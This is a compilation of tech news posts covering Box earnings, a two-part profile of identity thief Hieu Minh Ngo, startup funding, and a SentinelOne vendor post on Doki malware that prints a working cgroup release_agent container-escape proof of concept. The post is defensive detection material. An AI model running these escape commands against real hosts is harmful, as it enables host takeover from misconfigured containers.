Box benefits from digital transformation as it raises its growth forecast

/0 Comments/in /by

Box has always been a bit of an enigma for Wall Street, and perhaps for enterprise software in general. Unlike vendors who shifted to the cloud tools like HR, CRM or ERP, Box has been building a way to manage content in the cloud. It’s been a little harder to understand than these other enterprise software stalwarts, but slowly but surely Box has shifted into a more efficient, and dare we say, profitable public company.

Yesterday the company filed its Q2 2021 earnings report and it was solid. In fact, the company reported revenue of $192.3 million. That’s an increase of 11% year over year and it beat analyst’s expectations of $189.6 million, according to the company. Meanwhile the guidance looked good too, moving from a range of $760 to $768 million for the year to a range of $767 to $770 million.

All of this points to a company that is finding its footing. Let’s not forget, Starboard Value bought a 7.5% stake in the company a year ago, yet the activist investor has mostly stayed quiet and Box seems to be rewarding its patience as the pandemic acts as a forcing function to move customers to the cloud faster — and that seems to be working in Box’s favor.

Let’s get profitable

Box CEO Aaron Levie has not been shy about talking about how the pandemic has pushed companies to move to the cloud much more quickly than they probably would have. He said as a digital company, he was able to move his employees to work from home and remain efficient because of tools like Slack, Zoom, Okta and, yes, Box were in place to help them do that.

All of that helped keep the business going, and even thriving, through the extremely difficult times the pandemic has wrought. “We’re fortunate about how we’ve been able to execute in this environment. It helps that we’re 100% SaaS, and we’ve got a great digital engine to perform the business,” he said.

He added, “And at the same time, as we’ve talked about, we’ve been driving greater profitability. So the efficiency of the businesses has also improved dramatically, and the result was that overall we had a very strong quarter with better growth than expected and better profitability than expected. As a result, we were able to raise our targets on both revenue growth and profitability for the rest of the year,” Levie told TechCrunch.

Let’s get digital

Box is seeing existing customers and new customers alike moving more rapidly to the cloud, and that’s working in its favor. Levie believes that companies are in the process of reassessing their short and longer term digital strategy right now, and looking at what workloads they’ll be moving to the cloud, whether that’s cloud infrastructure, security in the cloud or content.

“Really customers are going to be trying to find a way to be able to shift their most important data and their most important content to the cloud, and that’s what we’re seeing play out within our customer base,” Levie said.

He added, “It’s not really a question anymore if you’re going to go to the cloud, it’s which cloud are you going to go to. And we’ve obviously been very focused on trying to build that leading platform for companies that want to be able to move their data to a cloud environment and be able to manage it securely, drive workflows on it, integrate it across our applications and that’s what we’re seeing,” he said.

That translated into a 60% increase quarter over quarter on the number of large deals over $100,000, and the company crossed 100,000 customers globally on the platform in the most recent quarter, so the approach seems to be working.

Let’s keep building

As with Salesforce a generation earlier, Box decided to build its product set on a platform of services. It enabled customers to tap into these base services like encryption, workflow and metadata and build their own customizations or even fully functional applications by taking advantage of the tools that Box has already built.

Much like Salesforce president and COO Bret Taylor told TechCrunch recently, that platform approach has been an integral part of its success, and Levie sees it similarly for Box. calling it fundamental to his company’s success, as well.

“We would not be here without that platform strategy,” he said. “Because we think about Box as a platform architecture, and we’ve built more and more capabilities into that platform, that’s what is giving us this strategic advantage right now,” he said.

And that hasn’t just worked to help customers using Box, it also helps Box itself to develop new capabilities more rapidly, something that has been absolutely essential during this pandemic when the company has had to react quickly to rapidly changing customer requirements.

Levie is 15 years into his tenure as CEO of Box, but he still sees a company and a market that is just getting started. “The opportunity is only bigger, and it’s more addressable by our product and platform today than it has been at any point in our history. So I think we’re still in the very early stages of digital transformation, and we’re in the earliest stages for how document and content management works in this modern era.”

Aaron Levie: ‘We have way too many manual processes in businesses’

Confessions of an ID Theft Kingpin, Part II

/0 Comments/in /by

Yesterday’s piece told the tale of Hieu Minh Ngo, a hacker the U.S. Secret Service described as someone who caused more material financial harm to more Americans than any other convicted cybercriminal. Ngo was recently deported back to his home country after serving more than seven years in prison for running multiple identity theft services. He now says he wants to use his experience to convince other cybercriminals to use their skills for good. Here’s a look at what happened after he got busted.

Hieu Minh Ngo, 29, in a recent photo.

Part I of this series ended with Ngo in handcuffs after disembarking a flight from his native Vietnam to Guam, where he believed he was going to meet another cybercriminal who’d promised to hook him up with the mother of all consumer data caches.

Ngo had been making more than $125,000 a month reselling ill-gotten access to some of the biggest data brokers on the planet. But the Secret Service discovered his various accounts at these data brokers and had them shut down one by one. Ngo became obsessed with restarting his business and maintaining his previous income. By this time, his ID theft services had earned roughly USD $3 million.

As this was going on, Secret Service agents used an intermediary to trick Ngo into thinking he’d trodden on the turf of another cybercriminal. From Part I:

The Secret Service contacted Ngo through an intermediary in the United Kingdom — a known, convicted cybercriminal who agreed to play along. The U.K.-based collaborator told Ngo he had personally shut down Ngo’s access to Experian because he had been there first and Ngo was interfering with his business.

“The U.K. guy told Ngo, ‘Hey, you’re treading on my turf, and I decided to lock you out. But as long as you’re paying a vig through me, your access won’t go away’,” the Secret Service’s Matt O’Neill recalled.

After several months of conversing with his apparent U.K.-based tormentor, Ngo agreed to meet him in Guam to finalize the deal. But immediately after stepping off of the plane in Guam, he was apprehended by Secret Service agents.

“One of the names of his identity theft services was findget[.]me,” O’Neill said. “We took that seriously, and we did like he asked.”

In an interview with KrebsOnSecurity, Ngo said he spent about two months in a Guam jail awaiting transfer to the United States. A month passed before he was allowed a 10 minute phone call to his family and explain what he’d gotten himself into.

“This was a very tough time,” Ngo said. “They were so sad and they were crying a lot.”

First stop on his prosecution tour was New Jersey, where he ultimately pleaded guilty to hacking into MicroBilt, the first of several data brokers whose consumer databases would power different iterations of his identity theft service over the years.

Next came New Hampshire, where another guilty plea forced him to testify in three different trials against identity thieves who had used his services for years. Among them was Lance Ealy, a serial ID thief from Dayton, Ohio who used Ngo’s service to purchase more than 350 “fullz” — a term used to describe a package of everything one would need to steal someone’s identity, including their Social Security number, mother’s maiden name, birth date, address, phone number, email address, bank account information and passwords.

Ealy used Ngo’s service primarily to conduct tax refund fraud with the U.S. Internal Revenue Service (IRS), claiming huge refunds in the names of ID theft victims who first learned of the fraud when they went to file their taxes and found someone else had beat them to it.

Ngo’s cooperation with the government ultimately led to 20 arrests, with a dozen of those defendants lured into the open by O’Neill and other Secret Service agents posing as Ngo.

The Secret Service had difficulty pinning down the exact amount of financial damage inflicted by Ngo’s various ID theft services over the years, primarily because those services only kept records of what customers searched for — not which records they purchased.

But based on the records they did have, the government estimated that Ngo’s service enabled approximately $1.1 billion in new account fraud at banks and retailers throughout the United States, and roughly $64 million in tax refund fraud with the states and the IRS.

“We interviewed a number of Ngo’s customers, who were pretty open about why they were using his services,” O’Neill said. “Many of them told us the same thing: Buying identities was so much better for them than stolen payment card data, because card data could be used once or twice before it was no good to them anymore. But identities could be used over and over again for years.”

O’Neill said he still marvels at the fact that Ngo’s name is practically unknown when compared to the world’s most infamous credit card thieves, some of whom were responsible for stealing hundreds of millions of cards from big box retail merchants.

“I don’t know of anyone who has come close to causing more material harm than Ngo did to the average American,” O’Neill said. “But most people have probably never heard of him.”

Ngo said he wasn’t surprised that his services were responsible for so much financial damage. But he was utterly unprepared to hear about the human toll. Throughout the court proceedings, Ngo sat through story after dreadful story of how his work had ruined the financial lives of people harmed by his services.

“When I was running the service, I didn’t really care because I didn’t know my customers and I didn’t know much about what they were doing with it,” Ngo said. “But during my case, the federal court received like 13,000 letters from victims who complained they lost their houses, jobs, or could no longer afford to buy a home or maintain their financial life because of me. That made me feel really bad, and I realized I’d been a terrible person.”

Even as he bounced from one federal detention facility to the next, Ngo always seemed to encounter ID theft victims wherever he went, including prison guards, healthcare workers and counselors.

“When I was in jail at Beaumont, Texas I talked to one of the correctional officers there who shared with me a story about her friend who lost her identity and then lost everything after that,” Ngo recalled. “Her whole life fell apart. I don’t know if that lady was one of my victims, but that story made me feel sick. I know now that was I was doing was just evil.”

Ngo’s former ID theft service usearching[.]info.

The Vietnamese hacker was released from prison a few months ago, and is now finishing up a mandatory three-week COVID-19 quarantine in a government-run facility near Ho Chi Minh city. In the final months of his detention, Ngo started reading everything he could get his hands on about computer and Internet security, and even authored a lengthy guide written for the average Internet user with advice about how to avoid getting hacked or becoming the victim of identity theft.

Ngo said while he would like to one day get a job working in some cybersecurity role, he’s in no hurry to do so. He’s already had at least one job offer in Vietnam, but he turned it down. He says he’s not ready to work yet, but is looking forward to spending time with his family — and specifically with his dad, who was recently diagnosed with Stage 4 cancer.

Longer term, Ngo says, he wants to mentor young people and help guide them on the right path, and away from cybercrime. He’s been brutally honest about his crimes and the destruction he’s caused. His LinkedIn profile states up front that he’s a convicted cybercriminal.

“I hope my work can help to change the minds of somebody, and if at least one person can change and turn to do good, I’m happy,” Ngo said. “It’s time for me to do something right, to give back to the world, because I know I can do something like this.”

Still, the recidivism rate among cybercriminals tends to be extremely high, and it would be easy for him to slip back into his old ways. After all, few people know as well as he does how best to exploit access to identity data.

O’Neill said he believes Ngo probably will keep his nose clean. But he added that Ngo’s service if it existed today probably would be even more successful and lucrative given the sheer number of scammers involved in using stolen identity data to defraud states and the federal government out of pandemic assistance loans and unemployment insurance benefits.

“It doesn’t appear he’s looking to get back into that life of crime,” O’Neill said. “But I firmly believe the people doing fraudulent small business loans and unemployment claims cut their teeth on his website. He was definitely the new coin of the realm.”

Ngo maintains he has zero interest in doing anything that might send him back to prison.

“Prison is a difficult place, but it gave me time to think about my life and my choices,” he said. “I am committing myself to do good and be better every day. I now know that money is just a part of life. It’s not everything and it can’t bring you true happiness. I hope those cybercriminals out there can learn from my experience. I hope they stop what they are doing and instead use their skills to help make the world better.”

Defeating “Doki” Malware and Container Escapes with Advanced Linux Behavioral Detection

/0 Comments/in /by

Recently, Intezer cybersecurity researchers uncovered an attack utilizing a new Linux malware targeting publicly accessible Docker servers. The new malware, dubbed “Doki”, is part of an active Ngrok Mining Botnet campaign, primarily targeting exposed Docker servers hosted with popular cloud platforms such as AWS, Azure, and GCP among others. This sophisticated attack exploits misconfigurations in Docker features, which are both common and can be difficult to avoid, and drops the Doki backdoor as one of its payloads.

The initial report noted that “Doki” went unrecognized as malware on VirusTotal for over seven months and claimed it was a “fully undetected backdoor”. Combined with the initial infection’s container escape technique, this has led to fears that enterprises making use of Docker servers are left with little hope of detecting this new kind of attack in the wild, and pressure has naturally mounted on SecOps and DevOps teams to ensure all Docker instances are properly configured in a ‘best effort’ attempt to secure container and cloud workloads. However, while ensuring proper configuration is certainly a fundamental part of an effective security posture, it is also difficult and time consuming; more importantly, it is also not enough to stop attackers that have exploited existing misconfigurations or who go on to discover further container vulnerabilities.

In this post, we show how the container escape and Doki malware attack proceeds, step by step, and demonstrate that neither are “fully undetectable”. We show that this and similar threats can be detected and mitigated against by means of SentinelOne’s Container Escape Protection, part of the SentinelOne Linux and Kubernetes Sentinel Agents.

Container Escape and Privilege Escalation

The main prize for the attackers is to achieve remote code execution on the host, and to this end they leverage the Docker API Create to set up their own containers. As previously reported, by using a legitimate Docker alpine image with curl installed, the attackers are able to use a bind configuration, which internally calls mount syscall, to bind /tmpXXXXXX to the root directory of the hosting server.

Having managed to execute code in the container and get access to the host, the attackers have the option of implementing different persistence methods to overcome the challenge of the average short lifespan of any individual container. In this attack, the initial payload gains persistence in the early stages right after the bind mount configuration by mapping cron to the malicious container.

Detecting the Container Escape with SentinelOne

As Gartner have previously pointed out, enterprises that try to use standard EPP solutions to protect server workloads are putting their business at risk. The only way to detect behaviors that involve correlation between container operations on a host’s file system is through an advanced AI technology that has visibility and understanding of the whole system – both host and containers – at once.

The SentinelOne agent is able to stop this attack precisely because it is constantly monitoring all activities and the malicious cron modifications are immediately detected, as shown below in the console’s threat page. Note how the threat indicators map the activity to MITRE ATT&CK TTPs for the analyst’s convenience:

The console also offers a useful graphical overview of the process tree:

And full logs are readily available showing all events from the current threat within the same interface:

Detecting the “Undetectable” Doki Malware Payload

SentinelOne’s agent is fully able to detect the container escape, but what about the malware that went undiscovered on VirusTotal for so many months and which was said to be “undetectable”?

Certainly, the malware and the initial attack are different steps that attackers could easily use separately; the malware could be dropped from different attack vectors, and it’s equally likely now that Doki has been “discovered” we will see new malware that has yet to be found on VirusTotal or any other malware repository.

Kubernetes Sentinel Agent
Runtime Protection and EDR for Containerized Workloads

Learn More

Fortunately, the SentinelOne agent does not rely on reputation or cloud connectivity, but analyses processes in real time locally on the device using our advanced machine learning model to detect and protect against abnormal behavior. The on-device agent monitors every process, file and network activity in both the host and containers together, allowing it to capture suspicious and malicious activity autonomously. As the following images show, Doki’s behaviour is immediately recognized by the SentinelOne agent as malicious.

Are There Other Container Escape Techniques?

The particular container escape used in this attack is not the only one available to threat actors. Last year, a security assessment of Kubernetes and Docker presented a different Proof of Concept for achieving a container escape. The PoC relied on another misconfiguration where the container has elevated privileges, either by the --privileged flag or the AppArmor=unconfined flag. The escape can be triggered by an exploit using the Linux cgroups (control groups) mechanism and a ‘release_agent’ file.

Linux control groups are intended to allow multiple Docker containers to run in isolation while limiting and monitoring their use of resources. However, the ‘release_agent’ file contains a command that is executed by the kernel with full privileges on the host once the last task in a cgroup terminates. The PoC abuses this functionality by creating a ‘release_agent’ file with a malicious command, and then killing off all the tasks in the cgroup.

As the cgroup files are present both in the container and on the host, it is possible to modify them from either, which means an attacker can spawn a process inside the cgroup and gain code execution on the host.

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"

The SentinelOne agent’s Behavioral AI is able to detect this exploitation attempt, providing full visibility and the Storyline of the attack vector that led to this malicious activity.

Conclusion

It is a good strategy for defenders to be familiar with and execute core workload protection strategies, but as the recent Doki and container escape malware attacks show, as soon as there is a weak link in the chain, the attacker will take advantage and such strategies will fail to protect the enterprise.

Modern attack methods in containerized environments in the cloud are gaining traction and becoming increasingly sophisticated. Given the rewards, threat actors are clearly willing to expend more effort to stay under the radar and to defeat “best practices”.

To fully protect your assets, move to a container protection solution, powered by unmatched behavioral AI models, that can autonomously detect and block malware across both hosts and containers. SentinelOne’s server and workload protection is infrastructure agnostic and can be deployed either in containers themselves, or in the machines that host them, in servers or in the cloud. If you would like to see how SentinelOne’s solution can work for you, contact us for more information or request a free demo.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Google Cloud Anthos update brings support for on-prem, bare metal

/0 Comments/in /by

When Google announced Anthos last year at Google Cloud Next, it was a pretty big deal. Here was a cloud company releasing a product that purported to help you move your applications between cloud companies like AWS and Azure — GCP’s competitors — because it’s what customers demanded.

Google tapped into genuine anxiety that tech leaders at customer companies are having over vendor lock-in in the cloud. Back in the client-server days, most of these folks got locked into a tech stack where they were at the mercy of the vendor. It’s something companies desperately want to avoid this go-round.

With Anthos, Google claimed you could take an application, package it in a container and then move it freely between clouds without having to rewrite it for the underlying infrastructure. It was and remains a compelling idea.

This year, the company is updating the product to include a couple of specialty workloads that didn’t get into version 1.0 last year. For starters, many customers aren’t just multi-cloud, meaning they have workloads on various infrastructure cloud vendors, they are also hybrid. That means they still have workloads on-prem in their own data centers, as well as in the cloud, and Google wanted to provide a way to include these workloads in Anthos.

Pali Bhat, VP of product and design at Google Cloud, says they have heard customers still have plenty of applications on premises and they want a way to package them as containerized, cloud-native workloads.

“They do want to be able to bring all of the benefits of cloud to both their own data centers, but also to any cloud they choose to use. And what Anthos enables them to do is go on this journey of modernization and digital transformation and be able to take advantage of it by writing once and running it anywhere, and that’s a really cool vision,” Bhat said.

And while some companies have made the move from on prem to the cloud, they still want the comfort of working on bare metal where they are the only tenant. The cloud typically offers a multi-tenant environment where users share space on servers, but bare metal gives a customer the benefits of being in the cloud with the ability to control their own destiny as they do on prem.

Customers were asking for Anthos to support bare metal, and so Google gave the people what they wanted and are releasing a beta of Anthos for bare metal this week, which Bhat says provides the answer for companies looking to have the benefits of Anthos at the edge.

“[The bare metal support] lets customers run Anthos […] at edge locations without using any hypervisor. So this is a huge benefit for customers who are looking to minimize unnecessary overhead and unlock new use cases, especially both in the cloud and on the edge,” Bhat said.

Anthos is part of a broader cloud modernization platform that Google Cloud is offering customers that includes GKE (the Kubernetes engine), Cloud Functions (the serverless offering) and Cloud Run (container run time platform). Bhat says this set of products taps into a couple of trends they are seeing with customers. First of all, as we move deeper into the pandemic, companies are looking for ways to cut costs while making a faster push to the cloud. The second is taking advantage of that push by becoming more agile and innovative.

It seems to be working. Bhat reports that in Q2, the company has seen a lot of interest. “One of the things in Q2 of 2020 that we’ve seen is that just Q2, over 100,000 companies used our application modernization platform and services,” he said.

Google Cloud’s fully managed Anthos is now generally available for AWS

MIT CSAIL grad launches machine learning platform with $10M Series A

/0 Comments/in /by

Manasi Vartak, founder and CEO of Verta, conceived of the idea of the open-source project ModelDB database as a way to track versions of machine models while she was still in grad school at MIT. After she graduated, she decided to expand on that vision to build a product that could not only track model versions, but provide a way to operationalize them — and Verta was born.

Today, that company emerged from stealth with a $10 million Series A led by Intel Capital with participation from General Catalyst, which also led the company’s $1.7 million seed round.

Beyond providing a place to track model versioning, which ModelDB gave users, Vartak wanted to build a platform for data scientists to deploy those models into production, which has been difficult to do for many companies. She also wanted to make sure that once in production, they were still accurately reflecting the current data and not working with yesterday’s playbook.

“Verta can track if models are still valid and send out alarms when model performance changes unexpectedly,” the company explained.

Verta interface

Image Credits: Verta

Vartak says having that open-source project helped sell the company to investors early on, and acts as a way to attract possible customers now. “So for our seed round, it was definitely different because I was raising as a solo founder, a first-time founder right out of school, and that’s where having the open-source project was a huge win,” she said.

Certainly Mark Rostick, VP and senior managing director at lead investor Intel Capital, recognized that Verta was trying to solve a fundamental problem around machine learning model production. “Verta is addressing one of the key challenges companies face when adopting AI — bridging the gap between data scientists and developers to accelerate the deployment of machine learning models,” Rostick said.

While Vartak wasn’t ready to talk about how many customers she has just yet at this early stage of the company, she did say there were companies using the platform and getting models into production much faster.

Today, the company has 9 employees, and even at this early stage, she is taking diversity very seriously. In fact, her current employee makeup includes four Indian, three Caucasian, one Latino and one Asian, for a highly diverse mix. Her goal is to continue on this path as she builds the company. She is looking at getting to 15 employees this year, then doubling that by next year.

One thing Vartak also wants to do is have a 50/50 gender split, something she was able to achieve while at MIT in her various projects, and she wants to carry on with her company. She is also working with a third party, Sweat Equity Ventures, to help with recruiting diverse candidates.

She says that she likes to work iteratively to build the platform, while experimenting with new features, even with her small team. Right now, that involves interoperability with different machine learning tools out there like Amazon SageMaker or Kubeflow, the open-source machine learning pipeline tool.

“We realized that we need to meet customers where they are at their level of maturity. So we focused a lot the last couple of quarters on building a system that was interoperable so you can pick and choose the components kind of like Lego blocks and have a system that works end to end seamlessly.”

Cisco acquiring BabbleLabs to filter out the lawn mower screeching during your video conference

/0 Comments/in /by

We’ve all been in a video conference, especially this year, when the neighbor started mowing the lawn or kids were playing outside your window — and it can get pretty loud. Cisco, which owns the WebEx video conferencing service, wants to do something about that, and late yesterday it announced it was going to acquire BabbleLabs, a startup that can help filter out background noise.

BabbleLabs has a very particular set of skills. It uses artificial intelligence to enhance the speaking voice, while filtering out those unwanted background noises that seem to occur whenever you happen to be in a meeting.

Interestingly enough, Cisco also sees this as a kind of privacy play by removing background conversation. Jeetu Patel, senior vice president and general manager in the Cisco Security and Applications Business Unit, says that this should go a long way toward improving the meeting experience for Cisco users.

“Their technology is going to provide our customers with yet another important innovation — automatically removing unwanted noise — to continue enabling exceptional Webex meeting experiences,” Patel, who was at Box for many years before joining Cisco, recently said in a statement.

In a blog post, BabbleLabs CEO and co-founder Chris Rowen wrote that conversations about being acquired by Cisco began just recently, and the deal came together pretty quickly. “We quickly reached a common view that merging BabbleLabs into the Cisco Collaboration team could accelerate our common vision dramatically,” he wrote.

BabbleLabs, which launched three years ago and raised $18 million, according to Crunchbase, had an interesting, but highly technical idea. That can sometimes be difficult to translate into a viable commercial product, but makes a highly attractive acquisition target for a company like Cisco.

Brent Leary, founder and principal analyst at CRM Essentials, says this acquisition could be seen as part of a broader industry consolidation. “We’re seeing consolidation taking place as the big web conferencing players are snapping up smaller players to round out their platforms,” he said.

He added, “WebEx may not be getting the attention that Zoom is, but it still has a significant presence in the enterprise, and this acquisition will allow them to keep improving their offering.”

The deal is expected to close in the current quarter after regulatory approval. Upon closing, BabbleLabs employees will become part of Cisco’s Collaboration Group.

LaunchNotes raises a $1.8M seed round to help companies communicate their software updates

/0 Comments/in /by

LaunchNotes, a startup founded by the team behind Statuspage (which Atlassian later acquired) and the former head of marketing for Jira, today announced that it has raised a $1.8 million seed round co-led by Cowboy Ventures and Bull City Ventures. In addition, Tim Chen (general partner, Essence Ventures), Eric Wittman (chief growth officer, JLL Technologies), Kamakshi Sivaramakrishnan (VP Product, LinkedIn), Scot Wingo (co-founder and CEO, Spiffy), Lin-Hua Wu (chief communications officer, Dropbox) and Steve Klein (co-founder, Statuspage) are participating in this round.

The general idea behind LaunchNotes is to help businesses communicate their software updates to internal and external customers, something that has become increasingly important as the speed of software developments — and launches — has increased.

In addition to announcing the new funding round, LaunchNotes also today said that it will revamp its free tier to include the ability to communicate updates externally through public embeds as well. Previously, users needed to be on a paid plan to do so. The team also now allows businesses to customize the look and feel of these public streams more and it did away with subscriber limits.

LaunchNotes helps companies better communicate their software updates

“The reason we’re doing this is largely because [ … ] our long-term goal is to drive this shift in how release communications is done,” LaunchNotes co-founder Jake Brereton told me. “And the easiest way we can do that and get as many teams on board as possible is to lower the barrier to entry. Right now, that barrier to entry is asking users to pay for it.”

As Brereton told me, the company gained about 100 active users since it launched three months ago.

Image Credits: LaunchNotes

“I think, more than anything, our original thesis has been validated much more than I expected,” co-founder and CEO Tyler Davis added. “This problem really does scale with team size and in a very linear way and the interest that we’ve had has largely been on the much larger, enterprise team side. It’s just become very clear that that specific problem — while it is an issue for smaller teams — is much more of a critical problem as you grow and as you scale out into multiple teams and multiple business units.”

It’s maybe no surprise then that many of the next items on the team’s roadmap include features that large companies would want from a tool like this, including integrations with issue trackers, starting with Jira, single sign-on solutions and better team management tools.

“With that initial cohort being on the larger team size and more toward enterprise, issue tracker integration is a natural first step into our integrations platform, because a lot of change status currently lives in all these different tools and all these different processes and LaunchNotes is kind of the layer on top of that,” explained co-founder Tony Ramirez. “There are other integrations with things like feature flagging systems or git tools, where we want LaunchNotes to be the one place where people can go. And for these larger teams, that pain is more acute.”

The fact that LaunchNotes is essentially trying to create a system of record for product teams was also part of what attracted Cowboy Ventures founder Aileen Lee to the company.

Image Credits: LaunchNotes

“One of the things that I thought was kind of exciting is that this is potentially a new system of record for product people to use that kind of lives in different places right now — you might have some of it in Jira and some in Trello, or Asana, and some of that in Sheets and some of it in Airtable or Slack,” she said. She also believes that LaunchNotes will make a useful tool when bringing on new team members or handing off a product to another developer.

She also noted that the founding team, which she believes has the ideal background for building this product, was quite upfront about the fact that it needs to bring more diversity to the company. “They recognized, even in the first meeting, ‘Hey, we understand we’re three guys, and it’s really important to us to actually build out [diversity] on our cap table and in our investing team, but then also in all of our future hires so that we are setting our company up to be able to attract all kinds of people,” she said.

Atlassian acquires StatusPage

Confessions of an ID Theft Kingpin, Part I

/0 Comments/in /by

At the height of his cybercriminal career, the hacker known as “Hieupc” was earning $125,000 a month running a bustling identity theft service that siphoned consumer dossiers from some of the world’s top data brokers. That is, until his greed and ambition played straight into an elaborate snare set by the U.S. Secret Service. Now, after more than seven years in prison Hieupc is back in his home country and hoping to convince other would-be cybercrooks to use their computer skills for good.

Hieu Minh Ngo, in his teens.

For several years beginning around 2010, a lone teenager in Vietnam named Hieu Minh Ngo ran one of the Internet’s most profitable and popular services for selling “fullz,” stolen identity records that included a consumer’s name, date of birth, Social Security number and email and physical address.

Ngo got his treasure trove of consumer data by hacking and social engineering his way into a string of major data brokers. By the time the Secret Service caught up with him in 2013, he’d made over $3 million selling fullz data to identity thieves and organized crime rings operating throughout the United States.

Matt O’Neill is the Secret Service agent who in February 2013 successfully executed a scheme to lure Ngo out of Vietnam and into Guam, where the young hacker was arrested and sent to the mainland U.S. to face prosecution. O’Neill now heads the agency’s Global Investigative Operations Center, which supports investigations into transnational organized criminal groups.

O’Neill said he opened the investigation into Ngo’s identity theft business after reading about it in a 2011 KrebsOnSecurity story, “How Much is Your Identity Worth?” According to O’Neill, what’s remarkable about Ngo is that to this day his name is virtually unknown among the pantheon of infamous convicted cybercriminals, the majority of whom were busted for trafficking in huge quantities of stolen credit cards.

Ngo’s businesses enabled an entire generation of cybercriminals to commit an estimated $1 billion worth of new account fraud, and to sully the credit histories of countless Americans in the process.

“I don’t know of any other cybercriminal who has caused more material financial harm to more Americans than Ngo,” O’Neill told KrebsOnSecurity. “He was selling the personal information on more than 200 million Americans and allowing anyone to buy it for pennies apiece.”

Freshly released from the U.S. prison system and deported back to Vietnam, Ngo is currently finishing up a mandatory three-week COVID-19 quarantine at a government-run facility. He contacted KrebsOnSecurity from inside this facility with the stated aim of telling his little-known story, and to warn others away from following in his footsteps.

BEGINNINGS

Ten years ago, then 19-year-old hacker Ngo was a regular on the Vietnamese-language computer hacking forums. Ngo says he came from a middle-class family that owned an electronics store, and that his parents bought him a computer when he was around 12 years old. From then on out, he was hooked.

In his late teens, he traveled to New Zealand to study English at a university there. By that time, he was already an administrator of several dark web hacker forums, and between his studies he discovered a vulnerability in the school’s network that exposed payment card data.

“I did contact the IT technician there to fix it, but nobody cared so I hacked the whole system,” Ngo recalled. “Then I used the same vulnerability to hack other websites. I was stealing lots of credit cards.”

Ngo said he decided to use the card data to buy concert and event tickets from Ticketmaster, and then sell the tickets at a New Zealand auction site called TradeMe. The university later learned of the intrusion and Ngo’s role in it, and the Auckland police got involved. Ngo’s travel visa was not renewed after his first semester ended, and in retribution he attacked the university’s site, shutting it down for at least two days.

Ngo said he started taking classes again back in Vietnam, but soon found he was spending most of his time on cybercrime forums.

“I went from hacking for fun to hacking for profits when I saw how easy it was to make money stealing customer databases,” Ngo said. “I was hanging out with some of my friends from the underground forums and we talked about planning a new criminal activity.”

“My friends said doing credit cards and bank information is very dangerous, so I started thinking about selling identities,” Ngo continued. “At first I thought well, it’s just information, maybe it’s not that bad because it’s not related to bank accounts directly. But I was wrong, and the money I started making very fast just blinded me to a lot of things.”

MICROBILT

His first big target was a consumer credit reporting company in New Jersey called MicroBilt.

“I was hacking into their platform and stealing their customer database so I could use their customer logins to access their [consumer] databases,” Ngo said. “I was in their systems for almost a year without them knowing.”

Very soon after gaining access to MicroBilt, Ngo says, he stood up Superget[.]info, a website that advertised the sale of individual consumer records. Ngo said initially his service was quite manual, requiring customers to request specific states or consumers they wanted information on, and he would conduct the lookups by hand.

Ngo’s former identity theft service, superget[.]info

“I was trying to get more records at once, but the speed of our Internet in Vietnam then was very slow,” Ngo recalled. “I couldn’t download it because the database was so huge. So I just manually search for whoever need identities.”

But Ngo would soon work out how to use more powerful servers in the United States to automate the collection of larger amounts of consumer data from MicroBilt’s systems, and from other data brokers. As I wrote of Ngo’s service back in November 2011:

“Superget lets users search for specific individuals by name, city, and state. Each “credit” costs USD$1, and a successful hit on a Social Security number or date of birth costs 3 credits each. The more credits you buy, the cheaper the searches are per credit: Six credits cost $4.99; 35 credits cost $20.99, and $100.99 buys you 230 credits. Customers with special needs can avail themselves of the “reseller plan,” which promises 1,500 credits for $500.99, and 3,500 credits for $1000.99.

“Our Databases are updated EVERY DAY,” the site’s owner enthuses. “About 99% nearly 100% US people could be found, more than any sites on the internet now.”

Ngo’s intrusion into MicroBilt eventually was detected, and the company kicked him out of their systems. But he says he got back in using another vulnerability.

“I was hacking them and it was back and forth for months,” Ngo said. “They would discover [my accounts] and fix it, and I would discover a new vulnerability and hack them again.”

COURT (AD)VENTURES, AND EXPERIAN

This game of cat and mouse continued until Ngo found a much more reliable and stable source of consumer data: A U.S. based company called Court Ventures, which aggregated public records from court documents. Ngo wasn’t interested in the data collected by Court Ventures, but rather in its data sharing agreement with a third-party data broker called U.S. Info Search, which had access to far more sensitive consumer records.

Using forged documents and more than a few lies, Ngo was able to convince Court Ventures that he was a private investigator based in the United States.

“At first [when] I sign up they asked for some documents to verify,” Ngo said. “So I just used some skill about social engineering and went through the security check.”

Then, in March 2012, something even more remarkable happened: Court Ventures was purchased by Experian, one of the big three major consumer credit bureaus in the United States. And for nine months after the acquisition, Ngo was able to maintain his access.

“After that, the database was under control by Experian,” he said. “I was paying Experian good money, thousands of dollars a month.”

Whether anyone at Experian ever performed due diligence on the accounts grandfathered in from Court Ventures is unclear. But it wouldn’t have taken a rocket surgeon to figure out that this particular customer was up to something fishy.

For one thing, Ngo paid the monthly invoices for his customers’ data requests using wire transfers from a multitude of banks around the world, but mostly from new accounts at financial institutions in China, Malaysia and Singapore.

O’Neill said Ngo’s identity theft website generated tens of thousands of queries each month. For example, the first invoice Court Ventures sent Ngo in December 2010 was for 60,000 queries. By the time Experian acquired the company, Ngo’s service had attracted more than 1,400 regular customers, and was averaging 160,000 monthly queries.

More importantly, Ngo’s profit margins were enormous.

“His service was quite the racket,” he said. “Court Ventures charged him 14 cents per lookup, but he charged his customers about $1 for each query.”

By this time, O’Neill and his fellow Secret Service agents had served dozens of subpoenas tied to Ngo’s identity theft service, including one that granted them access to the email account he used to communicate with customers and administer his site. The agents discovered several emails from Ngo instructing an accomplice to pay Experian using wire transfers from different Asian banks.

TLO

Working with the Secret Service, Experian quickly zeroed in on Ngo’s accounts and shut them down. Aware of an opportunity here, the Secret Service contacted Ngo through an intermediary in the United Kingdom — a known, convicted cybercriminal who agreed to play along. The U.K.-based collaborator told Ngo he had personally shut down Ngo’s access to Experian because he had been there first and Ngo was interfering with his business.

“The U.K. guy told Ngo, ‘Hey, you’re treading on my turf, and I decided to lock you out. But as long as you’re paying a vig through me, your access won’t go away’,” O’Neill recalled.

